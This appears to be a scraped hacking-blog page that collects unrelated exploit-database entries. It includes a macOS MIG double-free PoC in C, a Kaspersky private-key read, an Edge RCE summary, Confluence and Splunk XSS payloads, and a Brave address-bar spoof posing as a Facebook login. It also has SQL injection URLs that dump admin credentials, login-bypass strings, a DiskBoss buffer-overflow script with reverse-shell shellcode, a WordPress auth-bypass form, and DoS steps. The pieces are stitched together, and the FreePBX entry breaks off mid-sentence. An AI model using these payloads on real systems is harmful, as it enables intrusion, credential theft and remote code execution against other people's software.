/*
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=954
Proofs of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40954.zip
Userspace MIG services often use mach_msg_server or mach_msg_server_once to implent an RPC server.
These two functions are also responsible for managing the resources associated with each message
similar to the ipc_kobject_server routine in the kernel.
If a MIG handler method returns an error code then it is assumed to not have take ownership of any
of the resources in the message and both mach_msg_server and mach_msg_server_once will pass the message
to mach_msg_destroy:
If the message had and OOL memory descriptor it reaches this code:
case MACH_MSG_OOL_DESCRIPTOR : {
mach_msg_ool_descriptor_t *dsc;
dsc = &saddr->out_of_line;
if (dsc->deallocate) {
mach_msg_destroy_memory((vm_offset_t)dsc->address,
dsc->size);
}
break;
}
...
static void
mach_msg_destroy_memory(vm_offset_t addr, vm_size_t size)
{
if (size != 0)
(void) vm_deallocate(mach_task_self(), addr, size);
}
If the deallocate flag is set in the ool descriptor then this will pass the address contained in the descriptor
to vm_deallocate.
By default MIG client code passes OOL memory with the copy type set to MACH_MSG_PHYSICAL_COPY which ends up with the
receiver getting a 0 value for deallocate (meaning that you *do* need vm_deallocate it in the handler even if you return
and error) but by setting the copy type to MACH_MSG_VIRTUAL_COPY in the sender deallocate will be 1 in the receiver meaning
that in cases where the MIG handler vm_deallocate's the ool memory and returns an error code the mach_msg_* code will
deallocate it again.
Exploitability hinges on being able to get the memory reallocated inbetween the two vm_deallocate calls, probably in another thread.
This PoC only demonstrates that an instance of the bug does exist in the first service I looked at,
com.apple.system.DirectoryService.legacy hosted by /usr/libexec/dspluginhelperd. Trace through in a debugger and you'll see the
two calls to vm_deallocate, first in _receive_session_create which returns an error code via the MIG reply message then in
mach_msg_destroy.
Note that this service has multiple threads interacting with mach messages in parallel.
I will have a play with some other services and try to exploit an instance of this bug class but the severity should
be clear from this PoC alone.
Tested on MacOS Sierra 10.12 16A323
##############################################################################
crash PoC
dspluginhelperd actually uses a global dispatch queue to receive and process mach messages,
these are by default parallel which makes triggering this bug to demonstrate memory corruption
quite easy, just talk to the service on two threads in parallel.
Note again that this isn't a report about this particular bug in this service but about the
MIG ecosystem - the various hand-written equivilents of mach_msg_server* / dispatch_mig_server
eg in notifyd and lots of other services all have the same issue.
*/
// ianbeer
// build: clang -o dsplug_parallel dsplug_parallel.c -lpthread
/*
crash PoC
dspluginhelperd actually uses a global dispatch queue to receive and process mach messages,
these are by default parallel which makes triggering this bug to demonstrate memory corruption
quite easy, just talk to the service on two threads in parallel.
Note again that this isn't a report about this particular bug in this service but about the
MIG ecosystem - the various hand-written equivilents of mach_msg_server* / dispatch_mig_server
eg in notifyd and lots of other services all have the same issue.
*/
#include <pthread.h>
#include <stdio.h>
#include <stdlib.h>
#include <servers/bootstrap.h>
#include <mach/mach.h>
char* service_name = "com.apple.system.DirectoryService.legacy";
mach_msg_header_t* msg;
struct dsmsg {
mach_msg_header_t hdr; // +0 (0x18)
mach_msg_body_t body; // +0x18 (0x4)
mach_msg_port_descriptor_t ool_port; // +0x1c (0xc)
mach_msg_ool_descriptor_t ool_data; // +0x28 (0x10)
uint8_t payload[0x8]; // +0x38 (0x8)
uint32_t ool_size; // +0x40 (0x4)
}; // +0x44
mach_port_t service_port = MACH_PORT_NULL;
void* do_thread(void* arg) {
struct dsmsg* msg = (struct dsmsg*)arg;
for(;;){
kern_return_t err;
err = mach_msg(&msg->hdr,
MACH_SEND_MSG|MACH_MSG_OPTION_NONE,
(mach_msg_size_t)sizeof(struct dsmsg),
0,
MACH_PORT_NULL,
MACH_MSG_TIMEOUT_NONE,
MACH_PORT_NULL);
printf("%s\n", mach_error_string(err));
}
return NULL;
}
int main() {
mach_port_t bs;
task_get_bootstrap_port(mach_task_self(), &bs);
kern_return_t err = bootstrap_look_up(bs, service_name, &service_port);
if(err != KERN_SUCCESS){
printf("unable to look up %s\n", service_name);
return 1;
}
if (service_port == MACH_PORT_NULL) {
printf("bad service port\n");
return 1;
}
printf("got port\n");
void* ool = malloc(0x100000);
memset(ool, 'A', 0x1000);
struct dsmsg msg = {0};
msg.hdr.msgh_bits = MACH_MSGH_BITS_COMPLEX | MACH_MSGH_BITS(MACH_MSG_TYPE_COPY_SEND, 0);
msg.hdr.msgh_remote_port = service_port;
msg.hdr.msgh_local_port = MACH_PORT_NULL;
msg.hdr.msgh_id = 0x2328; // session_create
msg.body.msgh_descriptor_count = 2;
msg.ool_port.name = MACH_PORT_NULL;
msg.ool_port.disposition = 20;
msg.ool_port.type = MACH_MSG_PORT_DESCRIPTOR;
msg.ool_data.address = ool;
msg.ool_data.size = 0x1000;
msg.ool_data.deallocate = 0; //1;
msg.ool_data.copy = MACH_MSG_VIRTUAL_COPY;//MACH_MSG_PHYSICAL_COPY;
msg.ool_data.type = MACH_MSG_OOL_DESCRIPTOR;
msg.ool_size = 0x1000;
pthread_t threads[2] = {0};
pthread_create(&threads[0], NULL, do_thread, (void*)&msg);
pthread_create(&threads[1], NULL, do_thread, (void*)&msg);
pthread_join(threads[0], NULL);
pthread_join(threads[1], NULL);
return 0;
}
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863293104
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[x] Type: Admin login bypass via SQLi
[x] Vendor: http://software.friendsinwar.com/
[x] Script Name: My Click Counter
[x] Script Version: 1.0
[x] Script DL: http://software.friendsinwar.com/downloads.php?cat_id=2&file_id=15
[x] Author: AnarchyAngel AKA Adam
[x] Mail : anarchy[dot]ang31@gmail[dot]com
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Navigate to scripts admin login page and submit ' or ''=' for username and password
it should give you access to the admin area. Enjoy >:)
/*
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=989
When Kaspersky generate a private key for the local root, they store the private key in %ProgramData%. Obviously this file cannot be shared, because it's the private key for a trusted local root certificate and users can use it to create certificates, sign files, create new roots, etc. If I look at the filesystem ACLs, I should have access, and was about to complain that they've done this incorrectly, but it doesn't work and it took me a while to figure out what they were doing.
$ icacls KLSSL_privkey.pem
KLSSL_privkey.pem BUILTIN\Administrators:(I)(F)
BUILTIN\Users:(I)(RX) <-- All users should have read access
NT AUTHORITY\SYSTEM:(I)(F)
Successfully processed 1 files; Failed processing 0 files
$ cat KLSSL_privkey.pem
cat: KLSSL_privkey.pem: Permission denied
Single stepping through why this fails, I can see their filter driver will deny access from their PFLT_POST_OPERATION_CALLBACK after checking the Irpb. That sounds difficult to get right, and reverse engineering the filter driver, I can see they're setting Data->IoStatus.Status = STATUS_ACCESS_DENIED if the Irpb->Parameters (like DesiredAccess or whatever) don't match a hardcoded bitmask.
But the blacklist is insufficient, they even missed MAXIMUM_ALLOWED (?!!!). This is trivial to exploit, any unprivileged user can now become a CA.
*/
#include <windows.h>
#include <stdio.h>
#include <io.h>
#include <fcntl.h>
int main(int argc, char **argv)
{
HANDLE File;
BYTE buf[2048] = {0};
DWORD count;
File = CreateFile("c:\\ProgramData\\Kaspersky Lab\\AVP17.0.0\\Data\\Cert\\KLSSL_privkey.pem",
MAXIMUM_ALLOWED,
FILE_SHARE_READ | FILE_SHARE_WRITE,
NULL,
OPEN_EXISTING,
FILE_ATTRIBUTE_NORMAL,
NULL);
if (File != INVALID_HANDLE_VALUE) {
if (ReadFile(File, buf, sizeof(buf), &count, NULL) == TRUE) {
setmode(1, O_BINARY);
fwrite(buf, 1, count, stdout);
}
CloseHandle(File);
return 0;
}
return 1;
}
/*
$ cl test.c
Microsoft (R) C/C++ Optimizing Compiler Version 18.00.31101 for x86
Copyright (C) Microsoft Corporation. All rights reserved.
test.c
Microsoft (R) Incremental Linker Version 12.00.31101.0
Copyright (C) Microsoft Corporation. All rights reserved.
/out:test.exe
test.obj
$ ./test.exe | openssl rsa -inform DER -text -noout
Private-Key: (2048 bit)
modulus:
00:b4:3f:57:21:e7:c3:45:e9:43:ec:b4:83:b4:81:
bb:d3:3b:9b:1b:da:07:55:68:e0:b1:75:38:b9:66:
0d:4c:e4:e7:f3:92:01:fb:33:bf:e6:34:e4:e8:db:
f1:7c:53:bc:95:2c:2d:08:8d:7c:8c:03:71:cd:07:
*/
=====[ Tempest Security Intelligence - ADV-3/2016 CVE-2016-6283 ]==============
Persisted Cross-Site Scripting (XSS) in Confluence Jira Software
----------------------------------------------------------------
Author(s):
- Jodson Santos
- jodson.santos@tempest.com.br
Tempest Security Intelligence - Recife, Pernambuco - Brazil
=====[Table of Contents]=====================================================
1. Overview
2. Detailed description
3. Affected versions & Solutions
4. Timeline of disclosure
5. Thanks & Acknowledgements
6. References
=====[1. Overview]============================================================
* System affected : Atlassian Confluence
* Software Version : 5.9.12
Other versions or models may also be affected.
* Impact : This vulnerability allows an attacker to use
Confluence's
platform to deliver attacks against other users.
=====[2. Detailed description]================================================
Atlassian Confluence version 5.9.12 is vulnerable to persistent cross-site
scripting (XSS) because it fails to securely validate user controlled data,
thus making it possible for an attacker to supply crafted input in order to
harm users. The bug occurs at pages carrying attached files, even though
the attached file name parameter is correctly sanitized upon submission, it is
possible for an attacker to later edit the attached file name property and
supply crafted data (i.e HTML tags and script code) without the
occurrence of any security checks, resulting in an exploitable persistent XSS.
In order to reproduce the vulnerability, go to a page with an attached
file, click on "Attachments" in order to list the page's attachments, and then
click on "Properties" for the file of your choice. Edit the file name to, for
example, <script>alert(1)</script>test.pdf and then save the changes.
Albeit the XSS is not executed within the page display, it is possible to
trigger the execution of the supplied code while performing a search within
Confluence in which results include the attachment with crafted file name. For that
matter, the search terms " or * will promptly display the file and execute the
injected javascript code.
As a means to further enlighten this, the following excerpt demonstrates
a POST request with the malicious insertion within the newFileName field:
POST
/pages/doeditattachment.action?pageId={pageId}&attachmentBean.fileName={filename} HTTP/1.1
Host: {confluence host}
Cookie: mywork.tab.tasks=false; JSESSIONID={redacted};
confluence.browse.space.cookie=space-templates
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: {redacted}
atl_token={atl_token}&pageId={pageId}&isFromPageView=false&newFileName=<script>alert(1)</script>file&newComment=&newContentType=application%2Foctet-stream&newParentPage=&confirm=Save
It is worth noting that the issue may affect users regardless of privilege
levels, since the malicious page/attachment can be browsed by any user
within the Atlassian Confluence instance.
=====[3. Affected versions & Solutions]=======================================
This test was performed against Atlassian Confluence version 5.9.12.
According to vendor's response, the vulnerability is addressed and the
fix is part of the 5.10.6 release.
=====[4. Timeline of disclosure]==============================================
Jul/07/2016 - Vendor acknowledged the vulnerability.
Aug/04/2016 - Vendor released the fix for the vulnerability in version 5.10.6.
=====[5. Thanks & Acknowledgements]===========================================
- Tempest Security Intelligence / Tempest's Pentest Team [1]
- Joaquim Brasil
- Heyder Andrade
- Breno Cunha
=====[6. References]==========================================================
[1] https://en.wikipedia.org/wiki/Confluence_(software)
Source: https://github.com/theori-io/chakra-2016-11
Proofs of Concept: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40990.zip
chakra.dll Info Leak + Type Confusion for RCE
Proof-of-Concept exploit for Edge bugs (CVE-2016-7200 & CVE-2016-7201)
Tested on Windows 10 Edge (modern.ie stable).
FillFromPrototypes_TypeConfusion.html: WinExec notepad.exe
FillFromPrototypes_TypeConfusion_NoSC.html: 0xcc (INT 3)
To run:
Download exploit/FillFromPrototypes_TypeConfusion.html to a directory.
Serve the directory using a webserver (or python's simple HTTP server).
Browse with a victim IE to FillFromPrototypes_TypeConfusion.html.
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=963
The MAX86902 sensor has a driver that exposes several interfaces through which the device may be configured. In addition to exposing a character device, it also exposes several entries under sysfs.
Some of these entries are writable, allowing different values to be configured. Three such files are exposed under the paths:
/sys/devices/virtual/sensors/hrm_sensor/eol_test_result
/sys/devices/virtual/sensors/hrm_sensor/lib_ver
/sys/devices/virtual/sensors/uv_sensor/uv_lib_ver
The sysfs write handlers for these files all share approximately the same logic. Below is one such handler, for the "uv_lib_ver" sysfs entry:
1. static ssize_t max86900_uv_lib_ver_store(struct device *dev,
2. struct device_attribute *attr, const char *buf, size_t size)
3. {
4. struct max86900_device_data *data = dev_get_drvdata(dev);
5. unsigned int buf_len;
6. buf_len = (unsigned int)strlen(buf) + 1;
7. if (buf_len > MAX_LIB_VER)
8. buf_len = MAX_LIB_VER;
9.
10. if (data->uv_lib_ver != NULL)
11. kfree(data->uv_lib_ver);
12.
13. data->uv_lib_ver = kzalloc(sizeof(char) * buf_len, GFP_KERNEL);
14. if (data->uv_lib_ver == NULL) {
15. pr_err("%s - couldn't allocate memory\n", __func__);
16. return -ENOMEM;
17. }
18. strncpy(data->uv_lib_ver, buf, buf_len);
19. pr_info("%s - uv_lib_ver = %s\n", __func__, data->uv_lib_ver);
20. return size;
21. }
Since the code above does not use any mechanism to prevent concurrent access, it contains race conditions which allow corruption of kernel memory.
For example, one such race condition could occur when two attempts to call "write" are executed at the same time, where the underlying buffers have different lengths. More concretely, denote the two accessing tasks "task1" and "task2", correspondingly. Consider the following sequence of events:
-"task1" attempts to write to the entry, and provides a buffer of length 20.
-"task1" manages to execute lines 1-17 (inclusive)
-"task2" now attempts to write to the entry, and provides a buffer of length 2.
-"task2" manages to execute lines 1-13 (inclusive)
-"task1" now executes line 18, resulting in an overflow when writing to data->uv_lib_ver (since its actual length is now 2)
This issue can be addressed by adequate locking when accessing the sysfs entries.
I've statically and dynamically verified this issue on an SM-G935F device. The open-source kernel package I analysed was "SM-G935F_MM_Opensource", the device's build is "XXS1APG3".
The sysfs entries mentioned above have UID "system" and GID "radio". The SELinux context for these entries is: "u:object_r:sysfs_sensor_writable:s0".
According to the default SELinux rules as present on the SM-G935F (version XXS1APG3), the following contexts may access these files:
allow radio sysfs_sensor_writable : file { ioctl read write getattr lock append open } ;
allow factory_adsp sysfs_sensor_writable : file { ioctl read write getattr lock append open } ;
allow sensorhubservice sysfs_sensor_writable : file { write append open } ;
allow sysfs_sensor_writable sysfs_sensor_writable : filesystem associate ;
allow system_app sysfs_sensor_writable : file { ioctl read write getattr lock append open } ;
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40993.zip
Brave Browser Suffers from Address Bar Spoofing Vulnerability. Address Bar
spoofing is a critical vulnerability in which any attacker can spoof the
address bar to a legit looking website but the content of the web-page
remains different from the Address-Bar display of the site. In Simple
words, the victim sees a familiar looking URL but the content is not from
the same URL but the attacker controlled content. Some companies say "We
recognize that the address bar is the only reliable security indicator in
modern browsers" .
Products affected:
- In IOS - Affected is the Latest Version 1.2.16 (16.09.30.10)
- In Android - Affected in Brave Latest version 1.9.56
Exploit Code:
<html>
<title>Address Bar spoofing Brave</title>
<h1> This is Dummy Facebook </h1>
<form>
Email: <input type="text" name="username" placeholder="add email"><br>
Password: <input type="text" name="password" placeholder="pass">
<script>
function f()
{
location = "https://facebook.com"
}
setInterval("f()", 10);
</script>
</html>
Exploit Title : Advanced Desktop Locker [ Locker Bypass ]
# Date: 8 - 1 - 2017
# Software Link: http://www.encrypt4all.com/products/advanced-desktop-locker-information.php
# Sofrware Version : 6.0.0
# Exploit Author: Squnity | Sir.matrix
# Contact: secfathy@squnity.com
# Website: https://www.squnity.com
# Category: windows
1. Description
This Application Developed To Lock Desktop Control When User Download Files
Or Anywhere
I Can Kill TASK TO Bypass This Application
2. Proof of Concept
- Lock Your Desktop With ADL
- Click on Ctrl + R [ Run Shortcut ]
- Write CMD & Write taskmgr
- When Task Manager Open , Select ADL Prossess And Click Delete To Kill
- Exploited
POC Video :
https://www.youtube.com/watch?v=UXjHwzz2sEo&feature=youtu.be
#################################
#
# @@@ @@@@@@@@@@@ @@@@@ @@@@@@@@@@ @@@ @@@@@@@
# @@@ @@@@@@@@@@@ @@@ @@ @@@ @@ @@@ @@@@@@@@
# @@@ @@@ @@@ @@ @@@ @@ @@@ @@@ @@@
# @@@ @@@ @@@ @@ @@@ @@ @@@ @@@ @@@
# @@@ @@@@@@@@@@@ @@@ @ @@@@@@@@@@ @@@ @@@@@@
# @@@ @@@@@@@@@@@ @@@ @@ @@@ @@ @@@ @@@@@@
# @@@ @@@ @@@ @@ @@@ @@ @@@ @@@ @@@ @@@
# @@@ @@@ @@@ @@ @@@ @@ @@@ @@@ @@@ @@@
# @@@ @@@@@@@@@@@ @@@@@ @@@@@@@@@@ @@@ @@@ @@@ @@@
#
#####################################
#####################################
# Iranian Exploit DataBase
# Directadmin ControlPanel 1.50.1 denial of service Vulnerability
# Directadmin Version : 1.50.1 And Old Version
# Testet On : Centos 6 - Directadmin 1.50.1
# Vendor site : http://www.directadmin.com
# Author : Amir ( iedb.team@gmail.com - https://telegram.me/AmirAm67)
# Site : Www.IeDb.Ir - irist.ir - xssed.Ir
# Iedb Telegram : https://telegram.me/iedbteam
# Archive Exploit = http://www.iedb.ir/exploits-6517.html
#####################################
Description :
An attacker can send a username and password in the login screen DirectAdmin long,DirectAdmin to disrupt And Crach.
This problem is present in all versions of DirectAdmin.
There is no limit on the number of characters entered.
attacker could write a script to attack DDoS based on the following information:
http://Ip:2222/CMD_LOGIN
POST /CMD_LOGIN HTTP/1.1
referer=%2F&username=$POC&password=$POC
$POC = A * 10000
#####################################
** http://iedb.ir ==>> Iranian Exploit DataBase And Iranian Security Team
** http://irist.ir ==>> Register hacked sites
** http://xssed.Ir ==>> Sign vulnerable sites ( xss and sql ) (Vulnerability attack information site)
Thanks to : C0dex,B3hz4d,Beni_vanda,Mr_time,Bl4ck M4n,black_security,Yasser,Ramin Assadian,Black_Nofuzi,SecureHost,1TED,Mr_Kelever,Mr_keeper,Mahmod,Iedb,Khashayar,B3hz4d4,Shabgard,Cl09er,Ramin Asadyan,
Be_lucky,Moslem Haghighian,Dr_Iman,8Bit,Javid,Esmiley_Amir,Mahdi_feizezade,Amin_Zohrabi,Shellshock3 And all my friends And All Member In Iedb.Ir Team
#####################################
# Archive Exploit = http://www.iedb.ir/exploits-6517.html
#####################################
# Exploit Title: Splunk 'Referer' Header Cross Site Scripting Vulnerability
# Date: 7th January 2017
# Exploit Author: justpentest
# Vendor Homepage: http://www.splunk.com/
# Version: Splunk 6.1.1 other versions may also be affected.
# Contact: transform2secure@gmail.com
Source: https://www.securityfocus.com/bid/67655/info
1) Description:
Splunk is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in an unsuspecting user's browser in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
2) Exploit:
URL: http://justpentest.com:8000/en-US/app/
GET /en-US/app/ HTTP/1.1
Host=justpentest.com:8000
User-Agent=Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0
Accept=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language=en-US,en;q=0.5
Accept-Encoding=gzip, deflate
Referer=javascript:prompt("XXS by justpentest");
Connection=keep-alive
----------------------------------------------------------------------------------------
Response:
<p>This page was linked to from <a href="javascript:prompt("XXS by justpentest");">javascript:prompt("XXS by justpentest");</a>.</p>
# # # # #
# Vulnerability: My Php Dating 2.0 - SQL Injection Web Vulnerability
# Google Dork: My Php Dating
# Date:09.01.2017
# Vendor Homepage: http://www.phponlinedatingsoftware.com/demo.htm
# Script Name: My Php Dating
# Script Version: 2.0
# Script Buy Now: http://www.phponlinedatingsoftware.com/order.htm
# Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Mail : ihsan[beygir]ihsan[nokta]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/view_image.php?path=[SQL]
# # # # #
--------------------------------------------------
Note:
Rate: 0/10 [Rate Picture] <<<Link
--------------------------------------------------
http://localhost/[PATH]/view_image.php?path=-124 union select 1,version(),3,4,5,6,7,8,9
Version: javascript:%20ajax_rate_pic(5.5.52-cll,1,1)
--------------------------------------------------
http://localhost/[PATH]/view_image.php?path=-124+union+select+1,group_concat(admin_id,admin_uname,admin_pass,admin_email),3,4,5,6,7,8,9+from+admin_master--
--------------------------------------------------
http://localhost/[PATH]/view_image.php?path=-124+union+select+1,group_concat(column_name),3,4,5,6,7,8,9+from+information_schema.columns+where+table_schema=database()--
--------------------------------------------------
http://localhost/[PATH]/view_image.php?path=-124+union+select+1,group_concat(table_name),3,4,5,6,7,8,9+from+information_schema.tables+where+table_schema=database()--
# # # # #
# Vulnerability:: Admin Login Bypass & SQLi
# Date:09.01.2017
# Vendor Homepage: http://software.friendsinwar.com/
# Script Name: My Link Trader
# Script Version: v1.1
# Script DL: http://software.friendsinwar.com/downloads.php?cat_id=2&file_id=13
# Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Mail : ihsan[beygir]ihsan[nokta]net
# # # # #
# http://localhost/[PATH]/admin/login.php and set Username and Password to 'or''=' and hit enter.
# # # # #
# Vulnerability: My Php Dating 2.0 - SQL Injection
# Google Dork: use your mind
# Date: 09.01.2017
# Vendor Homepage: http://www.phponlinedatingsoftware.com/demo.htm
# Tested on: win7
# Author: Nassim Asrir
# Author Company: Henceforth
# Contact: wassline@gmail.com
#########################
# SQL Injection/Exploit :
# Vulnerable Parametre : id
# http://localhost/[PATH]/view_profile.php?id=[SQL]
# Exploit : Make or Break 1.7 (imgid) SQL Injection Vulnerability
# Author : v3n0m
# Contact : v3n0m[at]outlook[dot]com
# Date : January, 09-2017 GMT +7:00 Jakarta, Indonesia
# Software : Make or Break
# Version : 1.7 Lower versions may also be affected
# License : Free
# Download : http://software.friendsinwar.com/downloads.php?cat_id=2&file_id=9
# Credits : YOGYACARDERLINK, Dhea Fathin Karima & YOU !!
1. Description
An attacker can exploit this vulnerability to read from the database.
The parameter 'imgid' is vulnerable.
2. Proof of Concept
http://domain.tld/[path]/index.php?imgid=-9999+union+all+select+null,null,null,null,version(),null--
# Exploitation via SQLMap
Parameter: imgid (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: imgid=1 AND 4688=4688
Vector: AND [INFERENCE]
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 OR time-based blind
Payload: imgid=1 OR SLEEP(2)
Vector: OR [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])
Type: UNION query
Title: Generic UNION query (NULL) - 11 columns
Payload: imgid=1 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7176786271,0x746264586d76465246657a5778446f756c6d696859494e7247735476506447726470676f4e544c59,0x71706b7871),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- WQyQ
Vector: UNION ALL SELECT NULL,NULL,NULL,[QUERY],NULL,NULL,NULL,NULL,NULL,NULL,NULL[GENERIC_SQL_COMMENT]
3. Security Risk
The security risk of the remote sql-injection web vulnerability in the Make or Break CMS is estimated as high.
#!/usr/bin/python
# Exploit Title: DiskBoss Enterprise 7.5.12 SEH + Egghunter Buffer Overflow
# Date: 10-01-2017
# Exploit Author: Wyndell Bibera
# Software Link: http://www.diskboss.com/setups/diskbossent_setup_v7.5.12.exe
# Version: 7.5.12
# Tested on: Windows XP Professional SP3
import socket
ip = "192.168.86.150"
port = 80
egg = "ezggezgg"
nopslide = "\x90" * 8
# Bad characters: \x00\x09\x0a\x0d\x20
# Reverse Shell @ Port 443 - Change shellcode section accordingly
shellcode = ("\xb8\x45\x49\xe1\x98\xda\xc5\xd9\x74\x24\xf4\x5f\x29\xc9\xb1"
"\x52\x31\x47\x12\x03\x47\x12\x83\x82\x4d\x03\x6d\xf0\xa6\x41"
"\x8e\x08\x37\x26\x06\xed\x06\x66\x7c\x66\x38\x56\xf6\x2a\xb5"
"\x1d\x5a\xde\x4e\x53\x73\xd1\xe7\xde\xa5\xdc\xf8\x73\x95\x7f"
"\x7b\x8e\xca\x5f\x42\x41\x1f\x9e\x83\xbc\xd2\xf2\x5c\xca\x41"
"\xe2\xe9\x86\x59\x89\xa2\x07\xda\x6e\x72\x29\xcb\x21\x08\x70"
"\xcb\xc0\xdd\x08\x42\xda\x02\x34\x1c\x51\xf0\xc2\x9f\xb3\xc8"
"\x2b\x33\xfa\xe4\xd9\x4d\x3b\xc2\x01\x38\x35\x30\xbf\x3b\x82"
"\x4a\x1b\xc9\x10\xec\xe8\x69\xfc\x0c\x3c\xef\x77\x02\x89\x7b"
"\xdf\x07\x0c\xaf\x54\x33\x85\x4e\xba\xb5\xdd\x74\x1e\x9d\x86"
"\x15\x07\x7b\x68\x29\x57\x24\xd5\x8f\x1c\xc9\x02\xa2\x7f\x86"
"\xe7\x8f\x7f\x56\x60\x87\x0c\x64\x2f\x33\x9a\xc4\xb8\x9d\x5d"
"\x2a\x93\x5a\xf1\xd5\x1c\x9b\xd8\x11\x48\xcb\x72\xb3\xf1\x80"
"\x82\x3c\x24\x06\xd2\x92\x97\xe7\x82\x52\x48\x80\xc8\x5c\xb7"
"\xb0\xf3\xb6\xd0\x5b\x0e\x51\x1f\x33\x46\x2d\xf7\x46\x66\x2c"
"\xb3\xce\x80\x44\xd3\x86\x1b\xf1\x4a\x83\xd7\x60\x92\x19\x92"
"\xa3\x18\xae\x63\x6d\xe9\xdb\x77\x1a\x19\x96\x25\x8d\x26\x0c"
"\x41\x51\xb4\xcb\x91\x1c\xa5\x43\xc6\x49\x1b\x9a\x82\x67\x02"
"\x34\xb0\x75\xd2\x7f\x70\xa2\x27\x81\x79\x27\x13\xa5\x69\xf1"
"\x9c\xe1\xdd\xad\xca\xbf\x8b\x0b\xa5\x71\x65\xc2\x1a\xd8\xe1"
"\x93\x50\xdb\x77\x9c\xbc\xad\x97\x2d\x69\xe8\xa8\x82\xfd\xfc"
"\xd1\xfe\x9d\x03\x08\xbb\xae\x49\x10\xea\x26\x14\xc1\xae\x2a"
"\xa7\x3c\xec\x52\x24\xb4\x8d\xa0\x34\xbd\x88\xed\xf2\x2e\xe1"
"\x7e\x97\x50\x56\x7e\xb2")
scpad = "\x90" * (2480 - len(shellcode) - len(nopslide))
shortjmp = "\xeb\x0f\x90\x90"
# Search for string 'ezgg' twice
egghunter = ("\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
"\xef\xb8\x65\x7a\x67\x67\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7")
extra = "\x90" * 9
pad = "\x90" * (5000 - len(extra) - 2496 - len(egghunter))
# POP POP RET Instruction
seh = "\x6b\xa6\x02\x10"
buffer = (
"POST " + egg + nopslide + shellcode + scpad + shortjmp + seh + extra + egghunter + pad + " HTTP/1.1\r\n"
"Host: :192.168.86.150\r\n"
"User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; he; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12\r\n"
"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/* ;q=0.8\r\n\r\n")
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((ip, port))
s.send(buffer)
s.close()
# Exploit Title: WP Support Plus Responsive Ticket System 7.1.3 Privilege Escalation
# Date: 10-01-2017
# Software Link: https://wordpress.org/plugins/wp-support-plus-responsive-ticket-system/
# Exploit Author: Kacper Szurek
# Contact: http://twitter.com/KacperSzurek
# Website: http://security.szurek.pl/
# Category: web
1. Description
You can login as anyone without knowing password because of incorrect usage of wp_set_auth_cookie().
http://security.szurek.pl/wp-support-plus-responsive-ticket-system-713-privilege-escalation.html
2. Proof of Concept
<form method="post" action="http://wp/wp-admin/admin-ajax.php">
Username: <input type="text" name="username" value="administrator">
<input type="hidden" name="email" value="sth">
<input type="hidden" name="action" value="loginGuestFacebook">
<input type="submit" value="Login">
</form>
Then you can go to admin panel.
Exploit Title: Freepbx coockie recordings injection
Google Dork: Ask Santa
Date: 23/12/2016
Exploit Author: inj3ctor3
Vendor Homepage: https://www.freepbx.org/
Software Link: ISO LINKS IN SITE https://www.freepbx.org/
Version: ALL && unpatched/ (Trixbox/freepbx/elastix/pbxinflash/)
Tested on: Centos 6
CVE : CVE-2014-7235
1. Description
a critical Zero-Day Remote Code Execution and Privilege Escalation
exploit within the legacy “FreePBX ARI Framework module/Asterisk
Recording Interface (ARI)”.
htdocs_ari/includes/login.php in the ARI Framework module/Asterisk Recording Interface (ARI) in FreePBX before 2.9.0.9, 2.10.x,
and 2.11 before 2.11.1.5 allows remote attackers to execute arbitrary code via the ari_auth coockie,
related to the PHP unserialize function
<?php
.....
...
line 56 $buf = unserialize(stripslashes($_COOKIE['ari_auth']));
line 57 list($data,$chksum) = $buf;
....
?>
A successful attack may compromise the whole system aiding the hacker to gain
further privileges via taking advantage of famous nmap shell
without further or do this is a poc code
